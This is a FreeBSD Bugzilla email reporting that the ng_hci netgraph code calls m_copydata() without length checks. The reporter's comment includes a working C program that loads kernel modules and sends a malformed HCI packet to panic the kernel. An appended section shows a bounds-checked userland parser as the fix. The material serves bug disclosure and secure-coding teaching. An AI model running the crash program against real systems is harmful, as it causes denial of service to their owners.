Date: Wed, 26 Oct 2022 21:28:58 +0000
From: bugzilla-noreply@freebsd.org
To: bugs@FreeBSD.org
Subject: [Bug 267294] inquiry_result() in ng_hci_event.c ought to check before calling m_copydata()
Message-ID: <bug-267294-227-Wi0AO4kkhw@https.bugs.freebsd.org/bugzilla/>
In-Reply-To: <bug-267294-227@https.bugs.freebsd.org/bugzilla/>
References: <bug-267294-227@https.bugs.freebsd.org/bugzilla/>
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=267294

--- Comment #1 from Robert Morris <rtm@lcs.mit.edu> ---
The m_copydata() calls in num_compl_pkts() in ng_hci_evnt.c can also panic.
Here's a demo program:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <netgraph/ng_message.h>
#include <netgraph/ng_socket.h>
#include <netgraph.h>

int main(){
  setlinebuf(stdout);

  struct rlimit r;
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  signal(SIGPIPE, SIG_IGN);

  system("kldload netgraph");
  system("kldload ng_hci");

  int cs = -1;
  int ds = -1;
  NgMkSockNode(NULL, &cs, &ds);

  struct ngm_mkpeer mkp;
  memset(&mkp, 0, sizeof(mkp));
  strcpy(mkp.type, "hci");
  strcpy(mkp.ourhook, "hook");
  strcpy(mkp.peerhook, "drv");
  if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
    fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
  }

  char buf[128];
  memset(buf, 0xff, sizeof(buf));
  *(long long *)(buf + 0) ^= 0xecfb;
  NgSendData(ds, "hook", (unsigned char *)buf, 116);
}

-- 
You are receiving this mail because:
You are the assignee for the bug.
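The defect the comment describes is a length field taken from the packet and trusted by a loop of m_copydata() calls, which panic when asked for more bytes than the mbuf chain holds. The following is an added, userland example written for this page; it is not the bug reporter's code and not FreeBSD's ng_hci_evnt.c. It models the HCI Number_Of_Completed_Packets event layout (a one-byte handle count followed, per entry, by a 16-bit connection handle and a 16-bit completed-packet count, little-endian, as in the Bluetooth HCI specification) and shows the check a parser needs: verify that the received length covers every entry the count byte announces before copying any of them. The function and type names, and the sample buffers, are hypothetical and constructed here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical model of the HCI Number_Of_Completed_Packets event body:
 * one count byte, then 4 bytes per entry (2-byte handle, 2-byte count). */
#define NCP_ENTRY_SIZE 4u

struct ncp_entry {
    uint16_t con_handle;
    uint16_t compl_pkts;
};

/* Parse 'len' bytes of event body into 'out' (capacity 'out_cap' entries).
 * Returns the number of entries parsed, or -1 when the buffer is shorter
 * than the count byte claims.  Nothing is read beyond 'len': the bound is
 * checked once, up front, before any per-entry copy, which is the check the
 * kernel code lacks before its m_copydata() loop. */
int parse_num_compl_pkts(const uint8_t *buf, size_t len,
                         struct ncp_entry *out, size_t out_cap)
{
    if (buf == NULL || len < 1)
        return -1;

    size_t count = buf[0];

    /* Declared entries must fit inside the data actually received. */
    if (len < 1 + count * NCP_ENTRY_SIZE)
        return -1;
    if (count > out_cap)
        return -1;

    const uint8_t *p = buf + 1;
    for (size_t i = 0; i < count; i++, p += NCP_ENTRY_SIZE) {
        out[i].con_handle = (uint16_t)(p[0] | (p[1] << 8));
        out[i].compl_pkts = (uint16_t)(p[2] | (p[3] << 8));
    }
    return (int)count;
}

/* Constructed sample: a well-formed event with two entries
 * (handle 1 / 5 packets, handle 2 / 3 packets). */
static const uint8_t sample_well_formed[] = {
    0x02, 0x01, 0x00, 0x05, 0x00, 0x02, 0x00, 0x03, 0x00
};

/* Constructed sample: count byte 0xff but only three payload bytes,
 * the shape of input the unchecked loop would over-read. */
static const uint8_t sample_truncated[] = { 0xff, 0xff, 0xff, 0xff };

/* Constructed sample: one entry announced, one byte short of it. */
static const uint8_t sample_short_by_one[] = { 0x01, 0x01, 0x00, 0x05 };

/* Helpers returning the parse result for each sample, so the outcome is a
 * value rather than printed text. */
int check_well_formed(struct ncp_entry *out, size_t out_cap)
{
    return parse_num_compl_pkts(sample_well_formed,
                                sizeof(sample_well_formed), out, out_cap);
}

int check_truncated(void)
{
    struct ncp_entry scratch[8];
    return parse_num_compl_pkts(sample_truncated,
                                sizeof(sample_truncated), scratch, 8);
}

int check_short_by_one(void)
{
    struct ncp_entry scratch[8];
    return parse_num_compl_pkts(sample_short_by_one,
                                sizeof(sample_short_by_one), scratch, 8);
}

int main(void)
{
    struct ncp_entry entries[8];
    int n = check_well_formed(entries, 8);
    printf("well-formed: %d entries\n", n);
    for (int i = 0; i < n; i++)
        printf("  handle %u completed %u\n",
               entries[i].con_handle, entries[i].compl_pkts);
    printf("truncated:    %d\n", check_truncated());
    printf("short by one: %d\n", check_short_by_one());
    return 0;
}
```

The point of checking once against the total announced size, rather than before each entry, is that a rejected event is dropped as a whole and no partial state is committed; in a kernel parser the same guard would sit in front of the m_copydata() loop, comparing the count field against the remaining mbuf length.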